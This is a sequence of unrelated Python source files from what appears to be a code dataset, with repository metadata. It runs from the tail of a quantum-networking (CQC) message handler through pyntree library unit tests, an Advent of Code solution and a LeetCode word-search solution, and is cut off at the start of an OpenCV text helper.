xtra_hdr.setVals(step)\n elif command == CQC_CMD_MEASURE or command == CQC_CMD_MEASURE_INPLACE:\n xtra_hdr = CQCAssignHeader()\n ref_id = kwargs.get(\"ref_id\", 0)\n xtra_hdr.setVals(ref_id)\n\n # If xtra_hdr is None, we don't need an extra message.\n if xtra_hdr is None:\n header_length = CQCCmdHeader.HDR_LENGTH\n else:\n header_length = CQCCmdHeader.HDR_LENGTH + xtra_hdr.HDR_LENGTH\n\n # Construct Header\n hdr = CQCHeader()\n hdr.setVals(CQC_VERSION, CQC_TP_COMMAND, self._appID, header_length)\n\n # Construct Command\n cmd_hdr = CQCCmdHeader()\n notify = int(kwargs.get(\"notify\", True))\n block = int(kwargs.get(\"block\", True))\n action = int(kwargs.get(\"action\", False))\n cmd_hdr.setVals(qID, command, notify, block, action)\n\n headers = [hdr, cmd_hdr]\n if xtra_hdr is not None:\n headers.append(xtra_hdr)\n\n return headers\n\n def construct_simple(self, tp):\n \"\"\"Construct simple message.\n \n For example a HELLO message if tp=CQC_TP_HELLO.\n \"\"\"\n hdr = CQCHeader()\n hdr.setVals(CQC_VERSION, tp, self._appID, 0)\n msg = hdr.pack()\n return msg\n\n def sendSimple(self, tp):\n \"\"\"Construct and commit simple message.\"\"\"\n msg = self.construct_simple(tp)\n self.commit(msg)\n\n def close(self, release_qubits=True):\n \"\"\"Handle exiting of context.\"\"\"\n\n if release_qubits:\n for q in list(self.active_qubits):\n q.release()\n\n # Flush all remaining commands and the releases\n self.flush()\n\n self._pop_app_id()\n\n def _pop_app_id(self):\n \"\"\"\n Removes the used appID from the list.\n \"\"\"\n try:\n self._appIDs[self.name].remove(self._appID)\n except ValueError:\n pass # Already removed\n\n def create_qubits(self, num_qubits, block=True, notify=True):\n \"\"\"Requests the backend to reserve some qubits\n\n :param num_qubits: The amount of qubits to reserve\n :return: A list of qubits\n :param notify: Do we wish to be notified when done.\n :param block: Do we want the qubit to be blocked\n \"\"\"\n notify = self.notify and notify\n\n # TODO how to handle pending headers?\n headers = self.construct_command_headers(\n qID=num_qubits,\n command=CQC_CMD_ALLOCATE,\n notify=notify,\n block=block,\n )\n self.commit_headers(headers)\n\n qubits = self._handle_create_qubits(num_qubits=num_qubits, notify=notify)\n\n return qubits\n\n def sendGetTime(self, qID, notify=1, block=1, action=0):\n \"\"\"Sends get-time message\n\n - **Arguments**\n\n :qID: qubit ID\n :command: Command to be executed, eg CQC_CMD_H\n :notify: Do we wish to be notified when done.\n :block: Do we want the qubit to be blocked\n :action: Are there more commands to be executed\n \"\"\"\n # Send Header\n hdr = CQCHeader()\n hdr.setVals(CQC_VERSION, CQC_TP_GET_TIME, self._appID, CQCCmdHeader.HDR_LENGTH)\n msg = hdr.pack()\n self.commit(msg)\n\n # Send Command\n cmd_hdr = CQCCmdHeader()\n cmd_hdr.setVals(qID, 0, notify, block, action)\n cmd_msg = cmd_hdr.pack()\n self.commit(cmd_msg)\n\n def allocate_qubits(self, nb_of_qubits: int) -> List['qubit']:\n \"\"\"\n Creates (i.e. allocates) multiple qubits, and returns a list with qubit objects.\n\n :nb_of_qubits: The amount of qubits to be created.\n \"\"\"\n warnings.warn(\"allocate_qubits is deprecated, use create_qubits instead\",\n DeprecationWarning)\n\n return self.create_qubits(nb_of_qubits)\n\n def createEPR(self, name, remote_appID=0, notify=True, block=True, **kwargs):\n \"\"\"Creates epr with other host in the network.\n\n - **Arguments**\n\n :name: Name of the node as specified in the cqc network config file.\n :remote_appID: The app ID of the application running on the receiving node.\n :nofify: Do we wish to be notified when done.\n :block: Do we want the qubit to be blocked\n \"\"\"\n remote_ip, remote_port = self.get_remote_from_directory_or_address(name, **kwargs)\n\n # print info\n logging.debug(\n \"App {} puts message: 'Create EPR-pair with {} and appID {}'\".format(self.name, name, remote_appID)\n )\n notify = self.notify and notify\n self.put_command(\n 0,\n CQC_CMD_EPR,\n read_notify=False,\n notify=notify,\n block=block,\n remote_appID=remote_appID,\n remote_node=remote_ip,\n remote_port=remote_port,\n )\n if not self.pend_messages:\n q = self._handle_epr_response(notify=notify)\n return q\n\n def recvEPR(self, notify=True, block=True):\n \"\"\"Receives a qubit from an EPR-pair generated with another node.\n\n - **Arguments**\n\n :nofify: Do we wish to be notified when done.\n :block: Do we want the qubit to be blocked\n \"\"\"\n # print info\n logging.debug(\"App {} puts message: 'Receive half of EPR'\".format(self.name))\n notify = self.notify and notify\n self.put_command(\n qID=0,\n command=CQC_CMD_EPR_RECV,\n read_notify=False,\n notify=notify,\n block=block,\n )\n\n if not self.pend_messages:\n q = self._handle_epr_response(notify=notify)\n return q\n\n def sendQubit(self, q, name, remote_appID=0, notify=True, block=True, **kwargs):\n \"\"\"Sends qubit to another node in the cqc network. \n \n If this node is not in the network an error is raised.\n\n - **Arguments**\n\n :q: The qubit to send.\n :Name: Name of the node as specified in the cqc network config file.\n :remote_appID: The app ID of the application running on the receiving node.\n :nofify: Do we wish to be notified when done.\n :block: Do we want the qubit to be blocked\n \"\"\"\n remote_ip, remote_port = self.get_remote_from_directory_or_address(name, **kwargs)\n\n # print info\n logging.debug(\n \"App {} puts message: 'Send qubit with ID {} to {} and appID {}'\".format(\n self.name, q._qID, name, remote_appID\n )\n )\n notify = self.notify and notify\n self.put_command(\n qID=q._qID,\n command=CQC_CMD_SEND,\n notify=notify, \n block=block,\n remote_appID=remote_appID, \n remote_node=remote_ip,\n remote_port=remote_port,\n )\n # Deactivate qubit\n # TODO should this be done if pending messages?\n q._set_active(False)\n\n def recvQubit(self, notify=True, block=True):\n \"\"\"Receives a qubit.\n\n - **Arguments**\n\n :q: The qubit to send.\n :Name: Name of the node as specified in the cqc network config file.\n :remote_appID: The app ID of the application running on the receiving node.\n :nofify: Do we wish to be notified when done.\n :block: Do we want the qubit to be blocked\n \"\"\"\n\n # print info\n logging.debug(\"App {} puts message: 'Receive qubit'\".format(self.name))\n notify = self.notify and notify\n self.put_command(0, CQC_CMD_RECV, read_notify=False, notify=notify, block=block)\n if not self.pend_messages:\n # Get qubit id\n q_id = self.new_qubitID(print_cqc=True)\n\n # initialize the qubit\n q = qubit(self, createNew=False)\n q._qID = q_id\n\n # Activate and return qubit\n q._set_active(True)\n\n # Read the notify message\n if notify:\n message = self.readMessage()\n self._assert_done_message(message)\n self.print_CQC_msg(message)\n\n return q\n\n def flush(self, do_sequence=False):\n \"\"\"Flush all pending messages to the backend.\n \n :param do_sequence: boolean to indicate if you want to send the pending messages as a sequence\n :return: A list of things that are sent back from the server. Can be qubits, or outcomes\n \"\"\"\n return self.flush_factory(1, do_sequence)\n\n def flush_factory(self, num_iter, do_sequence=False, block_factory=False):\n \"\"\"\n Flushes the current pending sequence in a factory. It is performed multiple times\n :param num_iter: The amount of times the current pending sequence is performed\n :return: A list of outcomes/qubits that are produced by the commands\n \"\"\"\n if len(self._pending_headers) == 0:\n return []\n\n # Initialize should_notify to False\n should_notify = False\n\n # Store how many of the headers we send will get a response message from the backend\n response_amount = 0\n\n # Loop over the pending_headers to determine the total length and set should_notify\n for header in self._pending_headers:\n\n # Check if the current header is a Command header. It can also be a sub header\n if isinstance(header, CQCCmdHeader):\n # set should_notify to True if at least one of all command headers has notify to True\n should_notify = should_notify or header.notify\n \n # Remember this header if we expect a return messge\n if self.shouldReturn(header.instr):\n response_amount += 1\n\n # Determine the CQC Header type\n if num_iter == 1:\n cqc_type = CQC_TP_COMMAND\n else:\n # Build and insert the Factory header\n cqc_type = CQC_TP_FACTORY\n factory_header = CQCFactoryHeader()\n factory_header.setVals(num_iter, should_notify, block_factory)\n # Insert the factory header at the front\n self._pending_headers.insert(0, factory_header)\n \n # Insert the cqc header\n self.insert_cqc_header(cqc_type)\n \n # Send all pending headers\n self.send_pending_headers()\n\n # Reset _pending_headers to an empty list after all headers are sent\n self.reset_pending_headers()\n\n # Read out any returned messages from the backend\n res = self._handle_factory_response(num_iter, response_amount, should_notify=should_notify)\n \n # Return information that the backend returned\n return res\n\n def send_pending_headers(self) -> List[Any]:\n \"\"\"\n Sends all pending headers.\n After sending, self._pending_headers is emptied.\n \"\"\"\n\n # Send all pending headers\n to_log = \"App {} sends a message with the following headers:\\n\".format(self.name)\n msg = b''\n for header in self._pending_headers:\n to_log += \"\\t{}\\n\".format(header)\n msg += header.pack()\n logging.debug(to_log[:-1])\n self.commit(msg)\n\n def reset_pending_headers(self):\n \"\"\"Sets the list of pending headers to empty \"\"\"\n self._pending_headers = []\n\n def set_pending(self, pend_messages):\n \"\"\"Set the pend_messages flag.\n\n If true, flush() has to be called to send all self._pending_headers in sequence to the backend\n If false, all commands are directly send to the back_end\n :param pend_messages: Boolean to indicate if messages should pend or not\n \"\"\"\n # Check if the list is not empty, give a warning if it isn't\n if self._pending_headers:\n logging.warning(\"List of pending headers is not empty, flushing them\")\n self.flush()\n self._pend_messages = pend_messages\n\n def insert_cqc_header(self, cqc_type: CQCType, version=CQC_VERSION) -> None:\n \"\"\"\n Inserts a CQC Header at index 0 of self._pending_headers.\n Invoke this method *after* all other headers are pended, so that the correct message length is calculated.\n \"\"\"\n\n # Count the total message length\n message_length = 0\n for header in self._pending_headers:\n message_length += header.HDR_LENGTH\n\n # Build the CQC Header\n cqc_header = CQCHeader()\n cqc_header.setVals(CQC_VERSION, cqc_type, self._appID, message_length)\n\n # Insert CQC Header at the front\n self._pending_headers.insert(0, cqc_header)\n\n def _pend_type_header(self, cqc_type: CQCType, length: int) -> None:\n \"\"\"\n Creates a CQCTypeHeader and pends it.\n \"\"\"\n header = CQCTypeHeader()\n header.setVals(cqc_type, length)\n self.pend_header(header)\n\n def tomography(self, preparation, iterations, progress=True):\n \"\"\"\n Does a tomography on the output from the preparation specified.\n The frequencies from X, Y and Z measurements are returned as a tuple (f_X,f_Y,f_Z).\n\n - **Arguments**\n\n :preparation: A function that takes a CQCConnection as input and prepares a qubit and returns this\n :iterations: Number of measurements in each basis.\n :progress_bar: Displays a progress bar\n \"\"\"\n accum_outcomes = [0, 0, 0]\n if progress:\n bar = ProgressBar(3 * iterations)\n\n # Measure in X\n for _ in range(iterations):\n # Progress bar\n if progress:\n bar.increase()\n\n # prepare and measure\n q = preparation(self)\n q.H()\n m = q.measure()\n accum_outcomes[0] += m\n\n # Measure in Y\n for _ in range(iterations):\n # Progress bar\n if progress:\n bar.increase()\n\n # prepare and measure\n q = preparation(self)\n q.K()\n m = q.measure()\n accum_outcomes[1] += m\n\n # Measure in Z\n for _ in range(iterations):\n # Progress bar\n if progress:\n bar.increase()\n\n # prepare and measure\n q = preparation(self)\n m = q.measure()\n accum_outcomes[2] += m\n\n if progress:\n bar.close()\n del bar\n\n freqs = map(lambda x: x / iterations, accum_outcomes)\n return list(freqs)\n\n def test_preparation(self, preparation, exp_values, conf=2, iterations=100, progress=True):\n \"\"\"Test the preparation of a qubit.\n Returns True if the expected values are inside the confidence interval produced from the data received from\n the tomography function\n\n - **Arguments**\n\n :preparation: A function that takes a CQCConnection as input and prepares a qubit and returns this\n :exp_values: The expected values for measurements in the X, Y and Z basis.\n :conf: Determines the confidence region (+/- conf/sqrt(iterations) )\n :iterations: Number of measurements in each basis.\n :progress_bar: Displays a progress bar\n \"\"\"\n epsilon = conf / math.sqrt(iterations)\n\n freqs = self.tomography(preparation, iterations, progress=progress)\n for i in range(3):\n if abs(freqs[i] - exp_values[i]) > epsilon:\n print(freqs, exp_values, epsilon)\n return False\n return True\n\n def print_CQC_msg(self, message):\n \"\"\"\n Prints messsage returned by the readMessage method of CQCConnection.\n \"\"\"\n # First check if there was an error\n self.check_error(message[0])\n\n hdr = message[0]\n otherHdr = message[1]\n entInfoHdr = message[2]\n\n if hdr.tp == CQC_TP_HELLO:\n logging.debug(\"CQC tells App {}: 'HELLO'\".format(self.name))\n elif hdr.tp == CQC_TP_EXPIRE:\n logging.debug(\"CQC tells App {}: 'Qubit with ID {} has expired'\".format(self.name, otherHdr.qubit_id))\n elif hdr.tp == CQC_TP_DONE:\n logging.debug(\"CQC tells App {}: 'Done with command'\".format(self.name))\n elif hdr.tp == CQC_TP_RECV:\n logging.debug(\"CQC tells App {}: 'Received qubit with ID {}'\".format(self.name, otherHdr.qubit_id))\n elif hdr.tp == CQC_TP_EPR_OK:\n\n # Lookup host name\n remote_node = entInfoHdr.node_B\n remote_port = entInfoHdr.port_B\n remote_name = None\n try:\n for node in self._cqcNet.hostDict.values():\n if (node.ip == remote_node) and (node.port == remote_port):\n remote_name = node.name\n break\n if remote_name is None:\n raise RuntimeError(\"Remote node ({},{}) is not in config-file.\".format(remote_node, remote_port))\n except AttributeError:\n remote_name = \"({}, {})\".format(remote_node, remote_port)\n\n logging.debug(\n \"CQC tells App {}: 'EPR created with node {}, using qubit with ID {}'\".format(\n self.name, remote_name, otherHdr.qubit_id\n )\n )\n elif hdr.tp == CQC_TP_MEASOUT:\n logging.debug(\"CQC tells App {}: 'Measurement outcome is {}'\".format(self.name, otherHdr.outcome))\n elif hdr.tp == CQC_TP_INF_TIME:\n logging.debug(\"CQC tells App {}: 'Timestamp is {}'\".format(self.name, otherHdr.datetime))\n\n def parse_CQC_msg(self, message, q=None, is_factory=False):\n \"\"\"\n parses the cqc message and returns the relevant value of that measure\n (qubit, measurement outcome)\n\n :param message: str\n the cqc message to be parsed\n :param q: :obj:`cqc.pythonLib.qubit`\n the qubit object we should save the qubit to\n :param is_factory: bool\n whether the returned message came from a factory. If so, do not change the qubit, but create a new one\n :return: the result of the message (either a qubit, or a measurement outcome. Otherwise None\n \"\"\"\n hdr = message[0]\n otherHdr = message[1]\n if len(message) < 3:\n entInfoHdr = None\n else:\n entInfoHdr = message[2]\n\n if hdr.tp in {CQC_TP_RECV, CQC_TP_NEW_OK, CQC_TP_EPR_OK}:\n if is_factory:\n q._set_active(False) # Set qubit to inactive so it can't be used anymore\n q = qubit(self, createNew=False)\n if q is None:\n q = qubit(self, createNew=False)\n q._qID = otherHdr.qubit_id\n q._set_entanglement_info(entInfoHdr)\n q._set_active(True)\n return q\n if hdr.tp == CQC_TP_MEASOUT:\n return otherHdr.outcome\n if hdr.tp == CQC_TP_INF_TIME:\n return otherHdr.datetime\n\n def check_error(self, hdr):\n \"\"\"Checks if there is an error returned.\"\"\"\n\n self._errorHandler(hdr.tp)\n\n def _errorHandler(self, cqc_err):\n \"\"\"Raises an error if there is an error-message.\"\"\"\n\n if cqc_err == CQC_ERR_GENERAL:\n raise CQCGeneralError(\"General error\")\n if cqc_err == CQC_ERR_NOQUBIT:\n raise CQCNoQubitError(\"No more qubits available\")\n if cqc_err == CQC_ERR_UNSUPP:\n raise CQCUnsuppError(\"Sequence not supported\")\n if cqc_err == CQC_ERR_TIMEOUT:\n raise CQCTimeoutError(\"Timeout\")\n if cqc_err == CQC_ERR_UNKNOWN:\n raise CQCUnknownError(\"Unknown qubit ID\")\n\n @staticmethod\n def shouldReturn(command):\n return command in {\n CQC_CMD_NEW,\n CQC_CMD_MEASURE,\n CQC_CMD_MEASURE_INPLACE,\n CQC_CMD_RECV,\n CQC_CMD_EPR_RECV,\n CQC_CMD_EPR,\n }\n\n @staticmethod\n def hasXtraHeader(command):\n return command in {\n CQC_CMD_CNOT,\n CQC_CMD_SEND,\n CQC_CMD_EPR,\n CQC_CMD_ROT_X,\n CQC_CMD_ROT_Y,\n CQC_CMD_ROT_Z,\n CQC_CMD_CPHASE,\n }\n","repo_name":"SoftwareQuTech/CQC-Python","sub_path":"cqc/pythonLib/cqc_handler.py","file_name":"cqc_handler.py","file_ext":"py","file_size_in_byte":30664,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"21"} +{"seq_id":"22505473736","text":"# Q1.\nclass Rectangle :\n width = height = 0\n\n def __init__(self, w, h):\n self.width = w\n self.height = h\n def area_calc(self):\n area = self.width * self.height\n return area\n def circum_calc(self):\n circum = (self.width + self.height) * 2\n return circum\n\nprint(\"사각형의 넓이와 둘레를 계산합니다.\")\n\nw = int(input('사각형의 가로 입력 : '))\nh = int(input('사각형의 세로 입력 : '))\n\nprint('-'*25)\nrec = Rectangle(w, h)\narea = rec.area_calc()\nprint(f'사각형의 넓이 : {area}')\n\ncircum = rec.circum_calc()\nprint(f'사각형의 둘레 : {circum}')\nprint('-'*25)\n\n\n# Q2.\nclass Scattering :\n x = [5, 9, 1, 7, 4, 6]\n #def __init__(self):\n","repo_name":"dbparkJ/DataScience","sub_path":"PythonBasic/Chapter06/book_q.py","file_name":"book_q.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22067880675","text":"import unittest\nfrom pyntree import Node\nfrom pyntree.file import EXTENSIONS\nimport os\nfrom datetime import datetime as dt\n\nos.chdir(\"..\")\n\nBASIC_FILES = [\n 'tests/sample.txt',\n {'a': 1, 'b': {'c': 2}},\n \"tests/sample.pyn\",\n \"tests/sample.pyn.gz\",\n \"tests/sample.json\"\n]\n\nENCRYPTED_FILES = [\n \"tests/encrypted.pyn\",\n \"tests/encrypted.json\",\n \"tests/encrypted.txt\",\n \"tests/encrypted.zip\"\n]\n\nADVANCED_FILES = [ # These hold different data, or load in different ways\n \"tests/node-in-node.pyn\"\n]\n\n\n# noinspection PyMethodMayBeStatic,PyUnusedLocal\nclass FileLoading(unittest.TestCase):\n def test_basic_load(self):\n for item in BASIC_FILES:\n with self.subTest(msg=str(item)):\n db = Node(item)\n\n def test_blank_load(self):\n db = Node()\n self.assertEqual(db(), {})\n\n def test_serialized_load(self):\n db = Node('tests/serialized.pyn')\n self.assertTrue(True)\n\n def test_reload_from_file(self):\n db = Node('tests/sample_reloadme.txt')\n with open('tests/sample_reloadme.txt', 'w') as file:\n file.write(\"{'a': 2}\")\n file.truncate()\n db.file.reload()\n self.assertEqual(db(), {'a': 2})\n with open('tests/sample_reloadme.txt', 'w') as file: # Reset\n file.write(\"{'a': 1}\")\n file.truncate()\n\n def test_load_new_file(self):\n for ext in EXTENSIONS:\n with self.subTest(msg=ext):\n db = Node(f'tests/newdb.{ext}')\n os.remove(f'tests/newdb.{ext}')\n\n def test_encryption(self):\n for item in ENCRYPTED_FILES:\n with self.subTest(msg=str(item)):\n db = Node(item, password=\"testing\")\n\n def test_encryption_newfile(self):\n db = Node('tests/newdb.enc', filetype='pyn', password='pyntree', salt=os.urandom(32))\n os.remove('tests/newdb.enc')\n\n\nclass FileReading(unittest.TestCase):\n def setUp(self):\n self.databases = [Node(i) for i in BASIC_FILES]\n self.databases.append(Node(ADVANCED_FILES[0]).data())\n self.databases += [Node(i, password='testing') for i in ENCRYPTED_FILES]\n\n def test_layer_0(self):\n for db in self.databases:\n with self.subTest(msg=db.file.filetype):\n self.assertEqual(db(), {'a': 1, 'b': {'c': 2}})\n\n def test_layer_1(self):\n for db in self.databases:\n with self.subTest(msg=db.file.filetype):\n self.assertEqual(db.a(), 1)\n self.assertEqual(db.b(), {'c': 2})\n\n def test_layer_2(self):\n for db in self.databases:\n with self.subTest(msg=db.file.filetype):\n self.assertEqual(db.b.c(), 2)\n\n def test_star_args(self):\n db = Node(BASIC_FILES[0])\n self.assertEqual(str(db.get('a', 'b')), \"[1, Node({'c': 2})]\") # str(list) -> list(*repr(item)) for some reason\n\n def test_serialized_read(self):\n db = Node('tests/serialized.pyn')\n self.assertEqual(db.time(), dt(2023, 3, 6, 21, 2, 8, 550653))\n\n\nclass FileModification(unittest.TestCase):\n def test_layer_0(self):\n db = Node({})\n db.set('a', 1)\n self.assertEqual(db.a(), 1)\n\n def test_layer_1(self):\n db = Node({'a': {}})\n db.a.set('b', {})\n self.assertEqual(db.a.b(), {})\n\n def test_layer_2(self):\n db = Node({'a': {'b': {}}})\n db.a.b.set('c', 3)\n self.assertEqual(db.a.b.c(), 3)\n\n def test_star_args(self):\n db = Node({'a': 1, 'b': 15})\n with self.subTest(msg=\"Without creation\"):\n db.set('a', 'b', 2)\n self.assertEqual(db.a(), 2)\n self.assertEqual(db.b(), 2)\n with self.subTest(msg=\"With creation\"):\n db.set('a', 'b', 'c', True)\n for item in 'abc':\n self.assertTrue(db.get(item)())\n\n def test_alternate_set(self):\n db = Node({})\n db.z = 1\n # noinspection PyCallingNonCallable\n self.assertEqual(db.z(), 1)\n\n\n# noinspection PyMethodMayBeStatic\nclass FileSaving(unittest.TestCase):\n def setUp(self):\n self.filetypes = EXTENSIONS.keys()\n\n def test_save(self):\n for ext in self.filetypes:\n with self.subTest(msg=ext):\n db = Node({'a': 1, 'b': {'c': 2}})\n db.file.switch_to_file('tests/testing_output.' + ext)\n db.save()\n self.assertEqual(Node('tests/testing_output.' + ext)(), db())\n os.remove('tests/testing_output.' + ext)\n\n def test_serialized_save(self):\n db = Node({'time': dt.now()})\n db.save('tests/testing_serialization.pyn')\n os.remove('tests/testing_serialization.pyn')\n self.assertTrue(True)\n\n def test_encrypted_save(self):\n for ext in EXTENSIONS:\n with self.subTest(msg=ext):\n db = Node({'a': 1, 'b': {'c': 2}}, password='testing')\n db.save(f'tests/newdb.{ext}')\n os.remove(f'tests/newdb.{ext}')\n\n def test_encrypted_save_method(self):\n Node({'a': 1}).save('tests/newdb.pyn', password='testing')\n Node('tests/newdb.pyn', password='testing') # Attempt load to verify a proper save\n os.remove('tests/newdb.pyn')\n\n def test_save_to_alternate_file(self):\n # Initial data\n db = Node({'a': 1, 'b': {'c': 2}})\n db.switch_to_file('tests/testing_output.txt')\n db.save()\n del db\n # Overwrite, but maintain original file object\n db = Node({'n': 1, 'b': {'c': 2}})\n db.switch_to_file('tests/testing_output_2.pyn')\n db.save(filename='tests/testing_output.txt')\n db.save()\n self.assertEqual(Node(\"tests/testing_output.txt\")(), {'n': 1, 'b': {'c': 2}})\n self.assertEqual(Node(\"tests/testing_output_2.pyn\")(), {'n': 1, 'b': {'c': 2}})\n os.remove(\"tests/testing_output.txt\")\n os.remove(\"tests/testing_output_2.pyn\")\n\n def test_dictionary_filename(self):\n db = Node({'a': 'b'})\n db.save(filename='tests/testing_savedict.json')\n self.assertEqual(Node('tests/testing_savedict.json')(), {'a': 'b'})\n os.remove('tests/testing_savedict.json')\n\n def test_dictionary_filename_alt(self):\n db = Node({'a': 'b'})\n db.switch_to_file('tests/testing_savedict.json')\n db.save()\n self.assertEqual(Node('tests/testing_savedict.json')(), {'a': 'b'})\n os.remove('tests/testing_savedict.json')\n\n def test_node_in_node(self):\n db = Node({'a': Node()})\n db.save('tests/testing_save_NiN.pyn')\n os.remove('tests/testing_save_NiN.pyn')\n\n def test_save_after_password_set(self):\n db = Node({'a': 'b'})\n db.file.password = 'testing'\n db.save('tests/testing_encrypted_setpwd.pyn')\n self.assertEqual(Node('tests/testing_encrypted_setpwd.pyn', password='testing')(), {'a': 'b'})\n os.remove('tests/testing_encrypted_setpwd.pyn')\n\n def test_save_after_password_change(self):\n db = Node('tests/testing_encrypted_changepwd.pyn', password='testing1')\n db.a = 'b'\n db.file.password = 'testing2'\n db.save('tests/testing_encrypted_changepwd.pyn')\n self.assertEqual(Node('tests/testing_encrypted_changepwd.pyn', password='testing2')(), {'a': 'b'})\n os.remove('tests/testing_encrypted_changepwd.pyn')\n\n\nclass DeletionTests(unittest.TestCase):\n def test_layer_0(self):\n db = Node({'a': {'b': {'c': 'd'}}, 'b': \"test\"})\n db.delete()\n self.assertEqual(db(), {})\n\n def test_layer_1(self):\n db = Node({'a': {'b': {'c': 'd'}}, 'b': \"test\"})\n db.delete('a')\n self.assertEqual(db(), {'b': 'test'})\n\n def test_layer_1_alternate(self):\n db = Node({'a': {'b': {'c': 'd'}}, 'b': \"test\"})\n db.a.delete()\n self.assertEqual(db(), {\"b\": \"test\"})\n\n def test_layer_2(self):\n db = Node({'a': {'b': {'c': 'd'}}, 'b': \"test\"})\n db.a.delete('b')\n self.assertEqual(db(), {'a': {}, 'b': \"test\"})\n\n def test_layer_2_alternate(self):\n db = Node({'a': {'b': {'c': 'd'}}, 'b': \"test\"})\n db.a.b.delete()\n # noinspection PyCallingNonCallable\n self.assertEqual(db(), {'a': {}, 'b': \"test\"})\n\n def test_star_args(self):\n db = Node({'a': '', 'b': '', 'c': ''})\n db.delete(*'abc')\n self.assertEqual(db(), {})\n\n\nclass FileScanningTests(unittest.TestCase):\n def setUp(self):\n self.db = Node({\"val1\": 'h', \"val2\": 'b'})\n\n def test_has(self):\n self.assertTrue(self.db.has(\"val1\"))\n\n def test_has_star_args(self):\n self.assertTrue(self.db.has(\"val1\", \"val2\"))\n\n def test_values(self):\n self.assertEqual(self.db._values, [\"val1\", \"val2\"])\n\n def test__str__(self):\n self.assertEqual(str(self.db), str({\"val1\": 'h', \"val2\": 'b'}))\n\n def test__str__final(self):\n self.assertEqual(str(self.db.val1), \"h\")\n\n def test__repr__(self):\n self.assertEqual(repr(self.db), \"Node(\" + str({\"val1\": 'h', \"val2\": 'b'}) + \")\")\n\n def test__repr__final(self):\n self.assertEqual(repr(self.db.val1), \"'h'\")\n\n def test_name_layer_0_data(self):\n self.assertEqual(self.db._name, 'None')\n\n def test_name_layer_0_file(self):\n self.assertEqual(Node('tests/sample.txt')._name, 'tests/sample.txt')\n\n def test_name_layer_1(self):\n self.assertEqual(self.db.val1._name, 'val1')\n\n def test_get_children(self):\n self.assertEqual(self.db._children[0](), 'h')\n\n def test_where(self):\n db = Node({\n \"a\": {\n \"b\": 2\n },\n \"b\": {\n \"b\": 2\n },\n \"c\": {\n \"b\": 3\n }\n })\n matches = db.where(b=2)\n self.assertEqual(len(matches), 2)\n self.assertTrue(type(matches[0]) is Node)\n self.assertEqual(str(matches[0]), str({\"b\": 2}))\n\n def test_containing(self):\n db = Node({\n \"a\": {\n \"h\": 2\n },\n \"b\": {\n \"b\": 2\n },\n \"c\": {\n \"b\": 3\n }\n })\n matches = db.containing('b')\n self.assertEqual(len(matches), 2)\n self.assertTrue(type(matches[0]) is Node)\n self.assertEqual(str(matches[0]), str({\"b\": 2}))\n\n def test_getdict(self):\n db = Node({'a': {'b': {'c': 1}}})\n self.assertEqual(str(dict(db)), str({'a': {'b': {'c': 1}}}))\n\n\n# noinspection PyCallingNonCallable\nclass ArithmeticTests(unittest.TestCase):\n def test_iadd_int(self):\n db = Node()\n db.a = 1\n db.a += 1\n self.assertEqual(db.a(), 2)\n\n def test_iadd_str(self):\n db = Node()\n db.a = 'a'\n db.a += 'bc'\n self.assertEqual(db.a(), 'abc')\n\n def test_isub_int(self):\n db = Node()\n db.a = 1\n db.a -= 1\n self.assertEqual(db.a(), 0)\n\n def test_imul_int(self):\n db = Node()\n db.a = 2\n db.a *= 3\n self.assertEqual(db.a(), 6)\n\n def test_imul_str(self):\n db = Node()\n db.a = 'a'\n db.a *= 3\n self.assertEqual(db.a(), 'aaa')\n\n def test_cmp(self):\n db = Node()\n db.a = 1\n db.b = 2\n self.assertTrue(db.a < db.b)\n self.assertTrue(db.a <= db.b)\n self.assertFalse(db.a > db.b)\n self.assertFalse(db.a >= db.b)\n self.assertFalse(db.a == db.b)\n self.assertTrue(db.a != db.b)\n\n def test_nested_operations(self):\n db = Node({'a': {'b': 1}})\n db.a.b += 1\n self.assertEqual(db.a.b(), 2)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"jvadair/pyntree","sub_path":"tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":11669,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"15781364132","text":"files = ['input.txt', 'testInput.txt']\nwith open(files[0], 'r') as f:\n line = f.readlines()[0]\n\nrow = int(line[line.index(\"row\")+4: line.index(\", column\")])\ncol = int(line[line.index(\"column\")+7: line.index(\".\\n\")])\n\nnumber = 20151125\nr,c = 1,1\n\nwhile True:\n if r == row and c == col:\n break\n r -= 1\n c += 1\n if r == 0:\n r = c\n c = 1\n number = (number * 252533) % 33554393\n\nprint(number)\n","repo_name":"nabihestefan/AdventOfCode","sub_path":"Python/2015/day25/day25.py","file_name":"day25.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28780323845","text":"class Solution:\r\n def exist(self, board, word: str) -> bool:\r\n for i in board:\r\n i.insert(0, 0)\r\n i.append(0)\r\n board = [[0 for i in range(len(board[0]))]] + board + [[0 for i in range(len(board[0]))]]\r\n start = []\r\n for i in range(1, len(board) - 1):\r\n for j in range(1, len(board[0]) - 1):\r\n if word[0] == board[i][j]:\r\n start.append([i, j])\r\n for i in start:\r\n if self.search(board, word, i, 1, [i]):\r\n return True\r\n return False\r\n\r\n def search(self, board, word, position, letter, path):\r\n if letter == len(word):\r\n return True\r\n else:\r\n for i in [[position[0], position[1] + 1], [position[0], position[1] - 1], [position[0] + 1, position[1]], [position[0] - 1, position[1]]]:\r\n if board[i[0]][i[1]] == word[letter] and i not in path:\r\n if self.search(board, word, i, letter + 1, path+[i]):\r\n return True\r\n return False\r\n\r\n\r\na = Solution()\r\ninp1 = [[\"C\",\"A\",\"A\"],[\"A\",\"A\",\"A\"],[\"B\",\"C\",\"D\"]]\r\ninp2 = 'CBD'\r\nprint(a.exist(inp1, inp2))\r\n","repo_name":"MinnanZhou/Leetcode","sub_path":"79.py","file_name":"79.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6783123227","text":"import cv2 as cv\n# colors \nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nMAGENTA = (255, 0, 255)\nGREEN = (0, 255, 0)\nCYAN = (255, 255, 0)\nGOLD = (0, 255, 215)\nYELLOW = (0, 255, 255)\nORANGE = (0, 165, 230)\n\n\ndef showText(image, text, position, color, animateOnValue=None):\n fonts = 